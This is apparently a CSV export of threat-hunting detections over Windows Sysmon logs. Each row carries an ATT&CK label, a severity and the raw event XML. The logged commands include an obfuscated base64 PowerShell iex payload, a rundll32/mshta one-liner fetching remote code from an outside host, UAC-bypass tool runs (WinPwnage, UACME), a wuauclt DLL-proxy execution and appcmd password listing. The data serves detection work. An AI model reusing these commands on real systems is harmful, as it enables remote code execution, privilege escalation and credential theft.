gBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,High,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe start-process notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-01-26T13:21:14.023510Z"">
</TimeCreated>
<EventRecordID>2429138</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5272"" ThreadID=""6060"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-01-26 13:21:14.021</Data>
<Data Name=""ProcessGuid"">00247C92-174A-6010-0000-0010C0B2D92E</Data>
<Data Name=""ProcessId"">18548</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.18362.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">powershell.exe start-process notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\bouss\source\repos\blabla\blabla\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-5082-600D-0000-0020A246F726</Data>
<Data Name=""LogonId"">0x26f746a2</Data>
<Data Name=""TerminalSessionId"">5</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A</Data>
<Data Name=""ParentProcessGuid"">00247C92-1749-6010-0000-0010EFAAD92E</Data>
<Data Name=""ParentProcessId"">23168</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\windows\system32\cmd.exe&quot; /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /delete /tn elevator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T00:32:40.342246Z"">
</TimeCreated>
<EventRecordID>16249</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1996"" ThreadID=""1832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 00:32:40.164</Data>
<Data Name=""ProcessGuid"">365ABB72-69A8-5CD7-0000-0010C0982200</Data>
<Data Name=""ProcessId"">3792</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\schtasks.exe&quot; /delete /tn elevator</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5DEC-5CD7-0000-00204A380100</Data>
<Data Name=""LogonId"">0x1384a</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6998-5CD7-0000-00104E422200</Data>
<Data Name=""ParentProcessId"">2740</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:45.405337Z"">
</TimeCreated>
<EventRecordID>6175</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:45.383</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6D-5CEB-0000-0010332A0C00</Data>
<Data Name=""ProcessId"">3876</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:45.405337Z"">
</TimeCreated>
<EventRecordID>6175</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:45.383</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6D-5CEB-0000-0010332A0C00</Data>
<Data Name=""ProcessId"">3876</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T11:23:18.824713Z"">
</TimeCreated>
<EventRecordID>5410</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 11:23:17.702</Data>
<Data Name=""ProcessGuid"">747F3D96-6EA5-5D45-0000-00108FD3E100</Data>
<Data Name=""ProcessId"">7844</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-D4E9-5D45-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6EA5-5D45-0000-0010EED0E100</Data>
<Data Name=""ParentProcessId"">4768</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\WerFault.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564829508.675628,2019-08-03T14:51:48.675628+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe &quot;C:\Program Files\Windows Media Player\osk.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T10:51:48.431273Z"">
</TimeCreated>
<EventRecordID>5308</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 10:51:47.872</Data>
<Data Name=""ProcessGuid"">747F3D96-6743-5D45-0000-001068D7B500</Data>
<Data Name=""ProcessId"">6456</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\windows\system32\cmd.exe &quot;C:\Program Files\Windows Media Player\osk.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020FBD31800</Data>
<Data Name=""LogonId"">0x18d3fb</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6742-5D45-0000-00104A66B500</Data>
<Data Name=""ParentProcessId"">6380</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Desktop\UACME.exe</Data>
<Data Name=""ParentCommandLine"">UACME.exe 32</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602619902.279861,2020-10-14T00:11:42.279861+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-13T20:11:42.278672Z"">
</TimeCreated>
<EventRecordID>2196442</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5340"" ThreadID=""7092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-13 20:11:42.277</Data>
<Data Name=""ProcessGuid"">00247C92-09FE-5F86-0000-0010AC861401</Data>
<Data Name=""ProcessId"">6372</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">c:\windows\system32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">c:\Windows\System32\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-DE70-5F85-0000-002059F80600</Data>
<Data Name=""LogonId"">0x6f859</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-09FE-5F86-0000-001051841401</Data>
<Data Name=""ParentProcessId"">1716</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wuauclt.exe</Data>
<Data Name=""ParentCommandLine"">wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer </Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558452777.286254,2019-05-21T19:32:57.286254+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true); )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
</TimeCreated>
<EventRecordID>4125</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
<Data Name=""ProcessId"">1532</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-4F8A-5CE3-0000-0010C5BB4800</Data>
<Data Name=""ParentProcessId"">3548</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;cmd.exe&quot; /s /k pushd &quot;C:\Users\IEUser\Desktop&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1611667274.296774,2021-01-26T17:21:14.296774+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-01-26T13:21:13.978709Z"">
</TimeCreated>
<EventRecordID>2429137</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5272"" ThreadID=""6060"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-01-26 13:21:13.976</Data>
<Data Name=""ProcessGuid"">00247C92-1749-6010-0000-0010EFAAD92E</Data>
<Data Name=""ProcessId"">23168</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.1316 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot; /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd</Data>
<Data Name=""CurrentDirectory"">C:\Users\bouss\source\repos\blabla\blabla\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-5082-600D-0000-0020A246F726</Data>
<Data Name=""LogonId"">0x26f746a2</Data>
<Data Name=""TerminalSessionId"">5</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=DE550F262D31FF81730867A7E294795D085F503B,MD5=E567B7F80B21CC8905383BE1073F3707,SHA256=E5CC034E9062E1211FDDE5F85EBF2BD4E4EF63272BA23877C185C94FB503891E,IMPHASH=392B4D61B1D1DADC1F06444DF258188A</Data>
<Data Name=""ParentProcessGuid"">00247C92-1749-6010-0000-0010348FD92E</Data>
<Data Name=""ParentProcessId"">2988</Data>
<Data Name=""ParentImage"">C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe</Data>
<Data Name=""ParentCommandLine"">C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.124804,2019-05-27T05:29:20.124804+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.124804Z"">
</TimeCreated>
<EventRecordID>5979</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:20.084</Data>
<Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-0010F2DEFF00</Data>
<Data Name=""ProcessId"">2772</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
